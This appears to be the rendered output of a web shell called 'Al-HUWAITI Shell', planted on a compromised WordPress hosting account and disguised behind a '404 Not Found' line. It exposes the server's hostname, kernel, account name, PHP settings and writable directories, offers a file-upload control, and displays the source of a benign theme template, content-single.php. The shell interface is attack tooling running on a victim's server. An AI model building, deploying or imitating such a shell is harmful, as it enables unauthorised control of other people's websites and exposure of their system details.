hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/chryzalihi/www/wp-contentOLD/themes/longevity/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/chryzalihi/www/wp-contentOLD/themes/longevity/template-parts/content-single.php
<?php
/**
 * The default template for displaying the full single post
 *.
 * @package Longevity
 * 
 *
 */
?>

<article id="post-<?php the_ID(); ?>" <?php post_class(); ?> >
           
		<?php if( esc_attr(get_theme_mod( 'show_single_thumbnail', 1 ) ) ) :           
             longevity_post_thumbnail(); 
         endif; ?>
             
    <header class="entry-header">
		<?php longevity_post_header(); ?>             
            <div class="entry-meta">
                <?php longevity_entry_meta(); ?>
            </div>        
    </header>

  <div class="entry-content">
    <?php the_content();
      
	  // load our nav is our post is split into multiple pages
	 longevity_multipage_nav();
    ?>
  </div>
  
	<?php
		// Author bio.
		if ( is_single() && get_the_author_meta( 'description' ) ) :
			get_template_part( 'author-bio' );
		endif;
	?> 
  
<footer class="entry-footer">

	<?php longevity_post_pagination(); ?>
        
	<?php if( esc_attr(get_theme_mod( 'show_tags_list', 1 ) ) ) :
        longevity_tags_list( '<div class="entry-tags">', '</div>' );
    endif; ?>
    <div class="category-list">      
        <?php if( esc_attr(get_theme_mod( 'show_single_categories', 1 ) ) ) :
            longevity_categories_list();
        endif; ?>
    </div>	
</footer>
  
</article>

Al-HUWAITI Shell